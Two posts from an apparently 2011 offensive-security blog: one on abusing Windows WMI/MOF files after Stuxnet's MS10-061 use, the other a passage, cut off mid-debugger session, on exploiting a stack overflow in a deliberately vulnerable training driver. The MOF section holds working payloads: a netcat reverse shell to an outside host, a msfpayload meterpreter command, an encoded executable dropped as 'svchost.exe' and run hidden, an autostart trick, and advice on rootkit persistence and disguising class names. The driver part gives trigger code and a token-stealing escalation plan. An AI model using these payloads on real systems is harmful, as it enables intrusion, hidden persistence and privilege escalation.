dimanche 18 septembre 2011

Playing with MOF files on Windows, for fun & profit

In this article, we will focus on a high-level Windows feature that is not so well-known, and that can be interesting from an attacker's point of view. I will share my investigation of MOF files from its use in Stuxnet - in the exploitation of a vulnerability in the Windows Printer Spooler - to some basic practical examples of what we can do with MOF files.


1. Stuxnet and the Windows Printer Spooler vulnerability (MS10-061)

The Stuxnet Worm embedded 4 different 0-days, an overall analysis is given by Symantec in [1] . Stuxnet has already been discussed a lot, and there have been many good papers out there about the different vulnerabilities that are exploited. In particular, the paper [2] published in MISC magazine (french) gives a good overview of the vulnerability MS10-061 in Windows Printer Spooler.

Basically, this vulnerability permits to remotely execute code with SYSTEM privilege on a Windows XP machine if a printer is shared on the network. It was patched by Microsoft on September 2010 [3]. The other versions of Windows are vulnerable, but only when really particular conditions are met, as it is well sum up in [4] with the following figure:





Actually, when a printer is shared on the network on Windows XP, it's reachable by anybody as the Guest user in order to print documents. The "printer spooler service" which is locally responsible for handling the requests from the client is the spoolsv.exe process. It's possible to remotely talk with it by using the RPC protocol (Remote Procedure Call). Stuxnet simply uses the methods implemented by the service to ask it to write a file on the disk of the machine.

The article [2] explains in detail that it is possible to specify a destination path where to write the file by using the call to the API StartDocPrinter, which notifies the spooler that a new job arrived. In Stuxnet, the goal was to execute the payload after uploading it to a file on the remote machine. The authors actually used the Windows feature called WMI (Windows Management Instrumentation). So, we'll investigate this technology and we'll see some interesting subtleties.

2. Windows Management Instrumentation (WMI)

Before practicing, we need to know a bit of theory about WMI. So I'll try to sum up my researches about this Windows feature, and give the concepts that are useful before beginning to play with it.

According to [5], we learn that:
“WMI is an implementation of Web-Based Enterprise Management (WBEM) […]. The WBEM standard encompasses the design of an extensible enterprise data-collection and data-management facility that has the flexibility and extensibility required to manage local and remote systems that comprise arbitrary components”. “WMI consists of four main components: management applications, WMI infrastructure, providers, and managed objects (system, disks, processes, network components…)”. The following figure gives an overview of the architecture of WMI.

To sum up, it is an information exchange standard interface based on a client/server model:



... Well, the architecture is rather complex, let's try to dig into it...
First, at the center of the WMI architecture, we have the WMI Infrastructure which is composed of the CIMOM (Common Information Model Object Manager). It binds management applications - also called "consumers" - on the one hand and "providers" on the other hand. This object manager is also in relation with a repository (CIM/WMI repository) that stores CIM classes' definitions.

CIM classes are hierarchically organized with subclasses that inherit from their parent class. CIM classes are grouped in namespaces, which are just logical group of classes. For example, the namespace root\cimv2 includes most of the classes that represent computer's resources. The language used to describe CIM classes is called MOF (Managed Object Format).

What is really interesting with WMI is that it permits to execute some code when the notification of an event occurs. The event might be a program start, an user authentication, ... or any other Windows event. A MOF file needs to be registered into the CIM/WMI repository in order to be taken into account by WMI. When registering a MOF file, the CIM class(es) it describes are indeed added into the repository.

Let's see the classes that are interesting:
  • __EventFilter [6] [7]: permits to define a Windows event,
  • __EventConsumer [8]: defines a consumer. This class is actually an abstract class with several implementations. The most interesting one is ActiveScriptEventConsumer [9] because it makes possible to embed VBScript or JSScript in the consumer. Note that it is only available in the namespace root\subscription.
    The cool thing is that the consumer runs with SYSTEM privilege on Windows XP and Windows 2003 Server. Under Vista, it is running under the LOCAL_SERVICE user. I haven't tried under Windows 7, maybe someone ? =)
  • __FilterToConsumerBinding [10]: it is used to link the two other instances. In other words, it permits to activate the consumer - and to execute its code - whenever the defined event occurs.



      As we learn in [11], MOF files are compiled into the WMI repository using mofcomp.exe. Moreover, a MOF file that is put in the %SystemRoot%\System32\wbem\mof\ directory is automatically compiled and registered into the WMI repository. It is defined in the registry key HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\ as we can see in here:


      Note: @jduck1337 made me noticed that MOF files aren't autocompiled on Vista +

      The file mofcomp.log located in %SystemRoot%\System32\wbem\mof\Logs\ contains the logs about MOF files compilations, as shown in the following screenshot:



      This auto-compilation feature was used by Stuxnet: 2 files were uploaded on the targeted remote machine using MS10-061:
      • %SystemRoot%\System32\winsta.exe: Stuxnet’s main module
      • %SystemRoot%\System32\wbem\mof\sysnullevnt.mof: MOF file that will automatically compile itself and that contains the code needed to execute the winsta.exe file when some events occur.

      Now, let's see MOF files in action with 3 fictive examples.


      3. A basic example of MOF file

      Let's see a first basic example of MOF file: let's imagine that we want to launch an executable when some events occur on the system. For illustration purpose, we'll launch the executable (here, Netcat for Windows) when a new log entry is added.

      So, we create a correct MOF file with a consumer (instance of ActiveScriptEventConsumer) that executes a VBScript. This VBScript will just create a Shell object and execute netcat with the right parameters. We'll also define an event filter by instantiating the __EventFilter class, in order to define when the consumer will be executed. For the example, we'll notify the consumer from the event filter when a new entry is added in "Application" Logs.

      Event filters must use a SQL-like language called WQL (WMI Query Language) to define the Windows event(s) that will spark the execution of the consumer [12].

      Here is what looks like our first MOF file:
      #pragma namespace ("\\\\.\\root\\subscription")
      
      instance of __EventFilter as $FILTER
      {
          Name = "CLASS_FIRST_TEST";
          EventNamespace = "root\\cimv2";
       Query = "SELECT * FROM __InstanceCreationEvent "
        "WHERE TargetInstance ISA \"Win32_NTLogEvent\" AND "
        "TargetInstance.LogFile=\"Application\"";
      
          QueryLanguage = "WQL";
      };
      
      instance of ActiveScriptEventConsumer as $CONSUMER
      {
          Name = "CLASS_FIRST_TEST";
          ScriptingEngine = "VBScript";
      
          ScriptText =
            "Set objShell = CreateObject(\"WScript.Shell\")\n"
         "objShell.Run \"C:\\Windows\\system32\\cmd.exe /C C:\\nc.exe 192.168.38.1 1337 -e C:\\Windows\\system32\\cmd.exe\"\n";
      };
      
      instance of __FilterToConsumerBinding
      {
          Consumer = $CONSUMER ;
          Filter = $FILTER ;
      };

      The example of use with netcat is taken from [15].

      Maybe, some explanations are needed:
      • Firstly, the event filter defines the WQL query corresponding to the filter. Once again, I've referred to the MSDN to build the query. In WMI, a Windows event is represented using the abstract class __Event, which has many different subclasses. Here we use __InstanceCreationEvent [13].
      • Secondly, in the consumer we must specify in  ScriptingEngine that we want to use VBScript, and then, we just have to pass our script in ScriptText.

      • Thirdly, we bind the filter and the consumer.

      Okay, so in order to check our newly created MOF file, we just put it in the directory %SystemRoot%\System32\wbem\mof\. The instances are added into the repository. And we can confirm that if we add a new log entry - here, coming from a wrong login attempt on MS SQL - the executable nc.exe is started. It runs with SYSTEM privilege, because I'm doing my tests on a Windows 2003 Server SP2:


      It looks interesting, but that would be great to embed directly a payload into the MOF file. Let's see how to do this =)


      4. Embed a payload into a MOF file

      We have already seen that it's possible to put VBscript into an instance of ActiveScriptEventConsumer. So, we can directly put our payload encoded in VBScript !
      For example, it is possible to use msfencode with the option -t vbs in order to encode a shellcode in VBScript. Let's assume that we want to embed a reverse_tcp meterpreter (fictive example) into a MOF file, we can use the following command:

      msfpayload windows/meterpreter/reverse_tcp LHOST=<ip> R | msfencode 
      -e generic/none -t vbs

      And then, we just need to put the generated VBScript into our MOF file (note that it's necessary to escape all the quotes):

      #pragma namespace ("\\\\.\\root\\subscription")
      
      instance of __EventFilter as $FILTER
      {
          Name = "XPLOIT_TEST_SYSTEM";
          EventNamespace = "root\\cimv2";
          Query = "SELECT * FROM __InstanceCreationEvent "
        "WHERE TargetInstance ISA \"Win32_NTLogEvent\" AND "
        "TargetInstance.LogFile=\"Application\"";
      
          QueryLanguage = "WQL";
      };
      
      instance of ActiveScriptEventConsumer as $CONSUMER
      {
          Name = "XPLOIT_TEST_SYSTEM";
          ScriptingEngine = "VBScript";
      
          ScriptText = "Function jcmNPtWMUEOI() \n"
      "vURTl=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101) \n"
      // [...]
      "vURTl=vURTl&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(96)&Chr(46)&Chr(114)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(230)&Chr(15)&Chr(0)&Chr(0)&Chr(0)&Chr(192)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(192)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(64)&Chr(46)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(0)&Chr(92)&Chr(112)&Chr(0)&Chr(0)&Chr(0)&Chr(208)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(208)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(192) \n" 
      "Dim eXmdsyLFEs \n"
      "Set eXmdsyLFEs = CreateObject(\"Scripting.FileSystemObject\") \n"
      "Dim TxNAbBlYJ \n"
      "Dim OnzEldZtxrMeY \n"
      "Dim YzlWLAgbdcsRP \n"
      "Dim gpvFZLaXwIZzKCJ \n"
      "Set OnzEldZtxrMeY = eXmdsyLFEs.GetSpecialFolder(2) \n"
      "gpvFZLaXwIZzKCJ = OnzEldZtxrMeY & \"\\\" & eXmdsyLFEs.GetTempName() \n"
      "eXmdsyLFEs.CreateFolder(gpvFZLaXwIZzKCJ) \n"
      "YzlWLAgbdcsRP = gpvFZLaXwIZzKCJ & \"\\\" & \"svchost.exe\" \n"
      "Set TxNAbBlYJ = eXmdsyLFEs.CreateTextFile(YzlWLAgbdcsRP,2,0) \n"
      "TxNAbBlYJ.Write vURTl \n"
      "TxNAbBlYJ.Close \n"
      "Dim VvLFolkbOsQvlf \n"
      "Set VvLFolkbOsQvlf = CreateObject(\"Wscript.Shell\") \n"
      "VvLFolkbOsQvlf.run YzlWLAgbdcsRP, 0, true \n"
      "eXmdsyLFEs.DeleteFile(YzlWLAgbdcsRP) \n"
      "eXmdsyLFEs.DeleteFolder(gpvFZLaXwIZzKCJ) \n"
      "End Function \n"
      "jcmNPtWMUEOI \n";        
      };
      
      instance of __FilterToConsumerBinding
      {
          Consumer = $CONSUMER ;
          Filter = $FILTER ;
      };

      We can actually put any executable into a MOF file thanks to the possibility to use VBScript.

      In some circumstances, we might have a problem with the previous MOF files because the consumer isn't automatically started after its registration into the WMI repository. We'll now see a trick that can be used to overcome this.


      5. Consumer autostart after MOF file registration

      If we dig into the MSDN, we can see that the __InstanceCreationEvent class, that we have used so far in the WQL query, can be actually used to filter on the instantiation of a new class into the WMI repository. The name of the class in question must be given to TargetInstance.__class.
      So, it is possible to use this feature to trigger the autostart of the consumer. Let's see what looks like the new version of our MOF file:

      #pragma namespace ("\\\\.\\root\\subscription")
      
      class WoootClass 
      {
       [key]
       string Name;
      };
      
      instance of __EventFilter as $FILTER
      {
          Name = "XPLOIT_TEST_SYSTEM";
          EventNamespace = "root\\subscription";
       Query = "SELECT * FROM __InstanceCreationEvent "
               "WHERE TargetInstance.__class = \"WoootClass\"";
      
          QueryLanguage = "WQL";
      };
      
      instance of ActiveScriptEventConsumer as $CONSUMER
      {
          Name = "XPLOIT_TEST_SYSTEM";
          ScriptingEngine = "VBScript";
          ScriptText = "Function jcmNPtWMUEOI() \n"
      "vURTl=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101) \n"
      // [...]
      "vURTl=vURTl&Chr(98)&Chr(0) \n"
      "Dim eXmdsyLFEs \n"
      "Set eXmdsyLFEs = CreateObject(\"Scripting.FileSystemObject\") \n"
      "Dim TxNAbBlYJ \n"
      "Dim OnzEldZtxrMeY \n"
      "Dim YzlWLAgbdcsRP \n"
      "Dim gpvFZLaXwIZzKCJ \n"
      "Set OnzEldZtxrMeY = eXmdsyLFEs.GetSpecialFolder(2) \n"
      "gpvFZLaXwIZzKCJ = OnzEldZtxrMeY & \"\\\" & eXmdsyLFEs.GetTempName() \n"
      "eXmdsyLFEs.CreateFolder(gpvFZLaXwIZzKCJ) \n"
      "YzlWLAgbdcsRP = gpvFZLaXwIZzKCJ & \"\\\" & \"svchost.exe\" \n"
      "Set TxNAbBlYJ = eXmdsyLFEs.CreateTextFile(YzlWLAgbdcsRP,2,0) \n"
      "TxNAbBlYJ.Write vURTl \n"
      "TxNAbBlYJ.Close \n"
      "Dim VvLFolkbOsQvlf \n"
      "Set VvLFolkbOsQvlf = CreateObject(\"Wscript.Shell\") \n"
      "VvLFolkbOsQvlf.run YzlWLAgbdcsRP, 0, true \n"
      "eXmdsyLFEs.DeleteFile(YzlWLAgbdcsRP) \n"
      "eXmdsyLFEs.DeleteFolder(gpvFZLaXwIZzKCJ) \n"
      "End Function \n"
      "jcmNPtWMUEOI \n";        
      };
      
      instance of __FilterToConsumerBinding
      {
          Consumer = $CONSUMER ;
          Filter = $FILTER ;
      };
      
      instance of WoootClass
      {
       Name = "Woot";
      };
      

      As you can see, I have just added a new class called "WoootClass" at the beginning of the MOF file. This class actually does nothing, but it is instantiated. So after the registration into the WMI repository, this instantiation will automatically trigger the filter, which will in turn trigger the consumer containing our payload !

      Therefore, this trick permits to automatically run the consumer. It can be very useful in some situation when we don't want to wait for any Windows event.


      6. Interest

      It is important to remember that the MOF self-install directory is of course only writeable by an Administrator. That's why, MOF files are really interesting in two kinds of situations:
      1. When we are able to upload a file to a remote machine, into an arbitrary destination path (with Administrator privileges in order to be able to write into the MOF self-install directory). This is the example of MS10-061 with StartDocPrinter API.

      2. In a post-exploitation context, when we have already escalated our privileges to Administrator on a Windows machine. 

      The first situation is of course relatively rare. Nevertheless, it's interesting to notice that Metasploit provides a function generate_mof() in the file lib/msf/core/exploit/wbemexec.rb. This function uses the trick described in this article to autostart the consumer. For example, it is used by the exploit of MS10-061: exploits/windows/smb/ms10_061_spoolss [13].

      The psexec module (modules/exploits/windows/smb/psexec) also uses it when MOF_UPLOAD_METHOD is selected, as we can see it the following code snippet:
      if datastore['MOF_UPLOAD_METHOD']
         # payload as exe
         print_status("Trying wbemexec...")
         print_status("Uploading Payload...")
         if datastore['SHARE'] != 'ADMIN$'
          print_error('Wbem will only work with ADMIN$ share')
          return
         end
         simple.connect("ADMIN$")
         filename = rand_text_alpha(8) + ".exe"
         exe = generate_payload_exe
         fd = smb_open("\\system32\\#{filename}", 'rwct')
         fd << exe
         fd.close
         print_status("Created %SystemRoot%\\system32\\#{filename}")
      
         # mof to cause execution of above
         mofname = rand_text_alphanumeric(14) + ".MOF"
         mof = generate_mof(mofname, filename)
         print_status("Uploading MOF...")
         fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
         fd << mof
         fd.close
         print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
      
         # Disconnect from the ADMIN$
         simple.disconnect("ADMIN$")   
      

      In a post-exploitation context, I think that MOF files can provide an original way to hide malicious code into the WMI repository. The possibilities are almost infinite because we can basically say: "When _this_ event occurs, just do _that_ !". So, we can for example use MOF files with a backdoor or a rootkit in order to:

      • Automatically kill some processes as soon as they are launched (anti-rootkits...),
      • Automatically detect when the backdoor/rootkit has been deleted to load it again (dropper),
      • Automatically infect USB devices
      • ...
      What is interesting here is that it shows how high level features provided by the System can be abused by an attacker. Classes hidden into WMI repository are not likely to be quickly detected because this technology is not so well-known by users and it is rarely checked.

      However, it is still possible to detect malicious classes with a tool like WMI Object Browser from WMI Administrative Tools [14] that permits to explore the repository:


      Of course, giving class names that look apparently legitimate are likely to trick some curious users =)


      References 

      [1] W32.Stuxnet Dossier, by Symantec
      http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf

      [2] MS10-061 vulnerability in Windows Printer Spooler, MISC Magazine issue #53 (french), by ivanlef0u

      [3] Microsoft Security Bulletin MS10-061
      http://technet.microsoft.com/en-us/security/bulletin/MS10-061

      [4] MS10-061: Printer Spooler vulnerability
      http://blogs.technet.com/b/srd/archive/2010/09/14/ms10-061-printer-spooler-vulnerability.aspx

      [5] Windows Internals, book by Mark Russinovich & David Salomon

      [6] __EventFilter class, MSDN
      http://msdn.microsoft.com/en-us/library/aa394639%28v=vs.85%29.aspx

      [7] Creating an Event Filter, MSDN
      http://msdn.microsoft.com/en-us/library/aa389741%28VS.85%29.aspx

      [8] ActiveScriptEventConsumer class, MSDN
      http://msdn.microsoft.com/en-us/library/aa384749%28VS.85%29.aspx

      [9] __EventConsumer class, MSDN
      http://msdn.microsoft.com/en-us/library/aa394635

      [10] __FilterToConsumerBinding class, MSDN
      http://msdn.microsoft.com/en-us/library/aa394647%28v=VS.85%29.aspx

      [11] Managed Object Format (MOF), MSDN
      http://msdn.microsoft.com/en-us/library/aa823192%28VS.85%29.aspx

      [12] Querying with WQL (SQL for WMI), MSDN
      http://msdn.microsoft.com/en-us/library/aa392902%28v=VS.85%29.aspx

      [13] exploits/windows/smb/ms10_061_spoolss code, Metasploit Framework
      http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/smb/ms10_061_spoolss.rb 

      [14] WMI Administrative Tools, Microsoft
      http://www.microsoft.com/download/en/details.aspx?id=24045

      [15] Newsletter HSC #77, Article about MOF/WMI (french), by Stephane Milani (sorry for forgetting)
      http://www.hsc-news.com/archives/2011/000078.html

      Greetz to
      @Heurs for the idea to dig into MS10-061 =)

      dimanche 17 juillet 2011

      Windows Kernel Exploitation Basics - Part 4 : Stack-based Buffer Overflow exploitation (bypassing cookie)



      In this article, we'll exploit the Stack-based Buffer Overflow that is present into the DVWDDriver when we pass a too big buffer to the driver with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL. The concept of buffer overflow in kernelland is the same as in userland. Basically, we've got a buffer that sits in kernelland and we are able to overflow it, here because the function RtlCopyMemory() is not well used as we've seen in the first article of that serie.
      First of all, we'll see how to detect such a vulnerability in a driver and then we'll go thru the exploitation process, based on the information given in the book "A guide to Kernel Exploitation" and some papers on that topic that have been released.

      1. Triggering the vulnerability

      In order to trigger the vulnerability, I've made this small piece of code:
      /* IOCTL */
      #define DEVICEIO_DVWD_STACKOVERFLOW  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 
      
      int main(int argc, char *argv[]) {
       
       char junk[512];
       HANDLE hDevice;
       
       printf("--[ Fuzz IOCTL DEVICEIO_DVWD_STACKOVERFLOW ---------------------------\n");
       
       printf("[~] Building junk data to send to the driver...\n");
       memset(junk, 'A', 511);
       junk[511] = '\0';
       
       printf("[~] Open an handle to the driver DVWD...\n");
       hDevice = CreateFile("\\\\.\\DVWD", 
          GENERIC_READ | GENERIC_WRITE, 
          FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, 
          NULL, 
          OPEN_EXISTING, 
          0, 
          NULL);
       printf("\tHandle: %p\n",hDevice);
       getch();
       
       printf("[~] Send IOCTL DEVICEIO_DVWD_STACKOVERFLOW with junk data...\n");
       DeviceIoControl(hDevice, DEVICEIO_DVWD_STACKOVERFLOW, &junk, strlen(junk), NULL, 0, NULL, NULL);
      
       
       CloseHandle(hDevice);
       return 0;
      }
      

      The code is straightforward, it just sends a 512-byte buffer of junk data (actually 511 'A' + '\0'). This should be really enough to overflow the buffer used by the driver, which is only 64-byte length =)
      Okay, so let's compile and run the previous code, here's what we get:


      BOUM ! A nice Blue Screen Of Death !

      Now, we'll attach the Windows VM used for the tests to a remote kernel debugger, that is actually running in another Windows VM. All the details about how to set up remote debugging using VMWare are given in the article [1].

      We run the code again, and the Windows VM freezes after sending the buffer to the driver:



      ... Meanwhile, the remote kernel debugger detects the "fatal system error":

      *** Fatal System Error: 0x000000f7
                             (0xB497BD51,0xF786C6EA,0x08793915,0x00000000)
      
      Break instruction exception - code 80000003 (first chance)
      
      A fatal system error has occurred.
      Debugger entered on first try; Bugcheck callbacks have not been invoked.
      
      A fatal system error has occurred.
      

      To have more information (a dump), we type !analyze -v, and we get:

      kd> !analyze -v
      *******************************************************************************
      *                                                                             *
      *                        Bugcheck Analysis                                    *
      *                                                                             *
      *******************************************************************************
      
      DRIVER_OVERRAN_STACK_BUFFER (f7)
      A driver has overrun a stack-based buffer.  This overrun could potentially
      allow a malicious user to gain control of this machine.
      DESCRIPTION
      A driver overran a stack-based buffer (or local variable) in a way that would
      have overwritten the function's return address and jumped back to an arbitrary
      address when the function returned.  This is the classic "buffer overrun"
      hacking attack and the system has been brought down to prevent a malicious user
      from gaining complete control of it.
      Do a kb to get a stack backtrace -- the last routine on the stack before the
      buffer overrun handlers and bugcheck call is the one that overran its local
      variable(s).
      Arguments:
      Arg1: b497bd51, Actual security check cookie from the stack
      Arg2: f786c6ea, Expected security check cookie
      Arg3: 08793915, Complement of the expected security check cookie
      Arg4: 00000000, zero
      
      Debugging Details:
      ------------------
      
      
      DEFAULT_BUCKET_ID:  GS_FALSE_POSITIVE_MISSING_GSFRAME
      
      SECURITY_COOKIE:  Expected f786c6ea found b497bd51
      
      BUGCHECK_STR:  0xF7
      
      PROCESS_NAME:  fuzzIOCTL.EXE
      
      CURRENT_IRQL:  0
      
      LAST_CONTROL_TRANSFER:  from 80825b5b to 8086cf70
      
      STACK_TEXT:
      f5d6f770 80825b5b 00000003 b497bd51 00000000 nt!RtlpBreakWithStatusInstruction
      f5d6f7bc 80826a4f 00000003 000001ff 0012fcdc nt!KiBugCheckDebugBreak+0x19
      f5d6fb54 80826de7 000000f7 b497bd51 f786c6ea nt!KeBugCheck2+0x5d1
      f5d6fb74 f7858662 000000f7 b497bd51 f786c6ea nt!KeBugCheckEx+0x1b
      WARNING: Stack unwind information not available. Following frames may be wrong.
      f5d6fb94 f7858316 f785808c 02503afa 82499078 DVWDDriver!DvwdHandleIoctlStackOverflow+0x5ce
      f5d6fc10 41414141 41414141 41414141 41414141 DVWDDriver!DvwdHandleIoctlStackOverflow+0x282
      f5d6fc14 41414141 41414141 41414141 41414141 0x41414141
      f5d6fc18 41414141 41414141 41414141 41414141 0x41414141
      [...]
      f5d6fd20 41414141 41414141 41414141 41414141 0x41414141
      f5d6fd24 41414141 41414141 41414141 41414141 0x41414141
      
      
      STACK_COMMAND:  kb
      
      FOLLOWUP_IP:
      DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
      f7858662 cc              int     3
      
      SYMBOL_STACK_INDEX:  4
      
      SYMBOL_NAME:  DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
      
      FOLLOWUP_NAME:  MachineOwner
      
      MODULE_NAME: DVWDDriver
      
      IMAGE_NAME:  DVWDDriver.sys
      
      DEBUG_FLR_IMAGE_TIMESTAMP:  4e08f4d5
      
      FAILURE_BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
      
      BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
      

      So, this is the proof that the kernel stack has been overflowed. We can see all our 'A's (0x41) in the dump of the stack at the time of the crash. But, what is important to notice here is the error message: DRIVER_OVERRAN_STACK_BUFFER (f7) which means that the stack overflow has been directly detected by the kernel. This error confirms that a Stack-Cookie - also called a Stack-Canary - is used in order to avoid stack overflow... well, to try to avoid it =). The principle is the same as in userland with the /GS flag available in the linker of MS Visual Studio. Basically, a security cookie (a pseudo-random 4-byte value) is put on the stack between the saved value of EBP and local variables, so that we have to overflow this value if we want to reach and to overflow the saved EIP value. And of course, in the epilog of the function, the security cookie value is checked against the original value (expected value). If they don't match, the fatal error we're in front of is triggered !

      2. Stack-Canary ?

      If we disassemble the vulnerable function, here is what we can see:


      In the prologue of the function, there is a call to __SEH_prolog4_GS ; this is a function used to:
      • Setup the exception handler block (EXCEPTION_REGISTRATION_RECORD) corresponding to the __try { } __except { } written in the function,
      • Setup the Stack-Canary

      Moreover, in the epilog of the function, we can see a call to __SEH_epilog4_GS ; this is a function that retrieves the current value of the Stack-Canary and calls the __security_check_cookie() function. This last function is aimed to compare the current value with the expected value of the Stack-Canary. This expected value (symbol: __security_cookie) is stored in the .data segment. If the values don't match, the OS crashes in the same way as during the previous test.



      3. How to bypass the Stack-Canary in KernelLand ?

      In order to bypass the Stack-Canary, the goal is to trigger an exception before the check of the cookie, that's to say before the call to the __security_check_cookie() function. In userland, the typical way to do it is by sending a large buffer that will write above the stack limit, till we reach an unmapped page in order to spark a memory fault. However, it doesn't work in kernelland because memory fault exceptions that occur in kernel memory areas are not handled by exception handlers, but only crash the OS (BSOD).

      So, the idea is to generate a memory fault exception due to the access of an unmapped page in userland, not in kernelland. To do so, we'll create a mapped memory area (anonymous map) using CreateFileMapping() (see [1]) and MapViewOfFileEx() (see [2]) API calls. Then we fill this area with the address of the shellcode we'll write later on.
      It's important to understand that we pass a pointer to a user-space buffer, and its size, to the driver when we send a DEVICEIO_DVWD_STACKOVERFLOW IOCTL. The trick is to adjust the pointer to the buffer in such a way that the end of the buffer will sit in the unmapped page that follows. It's actually sufficient to put only the last 4 bytes of the buffer outside the anonymous map. This is well illustrated in the book of DVWDDriver's authors with this figure:



      By doing so, when the driver will read the content of the buffer (for the copy), it will end up trying to read an unmapped memory area in userland. Therefore an exception will be triggered, and it will be possible to bypass the Stack-Canary by using SEH exploitation in kernelland.


      4. Shellcoding

      I've decided not to use the same shellcode as the one given in the DVWDExploit for my tests. Instead of patching the SID into the Access Token of the exploit process, I would like to use another privilege escalation method: to steal the Access Token of a process that is running with Owner SID == NT AUTHORITY\SYSTEM SID, and overwrite the Access Token of the exploit process by the stolen one.

      I haven't reinvented the wheel to write the shellcode, I just referred to the two following great papers: [2] and [3]. The shellcode I've used is directly taken/adapted from those papers. The algorithm is the following:

      1. Find _KTHREAD structure corresponding to the current thread, into _KPRCB
      2. Find _EPROCESS structure corresponding to the current process, into _KTHREAD
      3. Look for _EPROCESS corresponding to the process with PID=4 (UniqueProcessId = 4) ; this is the "System" process that always has SID = NT AUTHORITY\SYSTEM SID.
      4. Retrieve the address of the Token of that process
      5. Look for _EPROCESS corresponding to the process we want to escalate
      6. Replace the Token of that process with the Token of the "System" process
      7. Return to userland using SYSEXIT instruction. Before calling SYSEXIT, we set the registers as it is explained in [2] in order to directly jump to our payload in userland that will run with full privileges.

      The first step consists in finding the good offsets in the kernel structures for Windows Server 2003 SP2. To do so, we're going to dig into those structures using kd:

      kd> r
      eax=00000001 ebx=000063a3 ecx=80896d4c edx=000002f8 esi=00000000 edi=ed8fcfa8
      eip=8086cf70 esp=80894560 ebp=80894570 iopl=0         nv up ei pl nz na po nc
      cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202
      
      kd> dg @fs
                                        P Si Gr Pr Lo
      Sel    Base     Limit     Type    l ze an es ng Flags
      ---- -------- -------- ---------- - -- -- -- -- --------
      0030 ffdff000 00001fff Data RW    0 Bg Pg P  Nl 00000c92
      
      kd> dt nt!_kpcr ffdff000
         [...]
         +0x120 PrcbData         : _KPRCB
         
      kd> dt nt!_kprcb ffdff000+0x120
